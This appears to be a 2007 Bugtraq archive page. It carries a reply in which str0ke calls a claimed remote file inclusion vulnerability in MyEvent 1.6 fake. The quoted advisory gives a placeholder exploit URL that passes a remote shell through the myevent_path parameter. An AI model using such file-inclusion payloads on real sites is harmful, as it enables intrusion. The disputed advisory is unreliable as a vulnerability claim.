Bugtraq mailing list archives
Re: MyEvent1.6 (template.php) Remote File Inclusion Vulnerability
From: str0ke <str0ke () milw0rm com>
Date: Sat, 2 Jun 2007 11:17:09 -0500
Another fake, the entire file is a class. /str0ke On 2 Jun 2007 07:07:53 -0000, yaser () gencturk net <yaser () gencturk net> wrote:
######################################################################### # # MyEvent1.6 (template.php) Remote File Inclusion Vulnerability # # Author: Yaser <yaser () gencturk net> # # Homepage: http://www.ayyildiz.org # ######################################################################### ######################################################################### # Download S : http://mywebland.com/download.php?id=6 # # ERROR: # # include_once($myevent_path.'includes/template.php') # # Exploit: # http://[site]/[PaTh]/includes/template.php?myevent_path=[shell] # ######################################################################### Thanks: ir4dex - ht08 - ajann - H0tturk - Zakix - Devil Hacker
Current thread:
- MyEvent1.6 (template.php) Remote File Inclusion Vulnerability yaser (Jun 02)
- Re: MyEvent1.6 (template.php) Remote File Inclusion Vulnerability str0ke (Jun 02)
- Recent OpenSSL exploits Ryan's spam address (Jun 04)
- Re: MyEvent1.6 (template.php) Remote File Inclusion Vulnerability str0ke (Jun 02)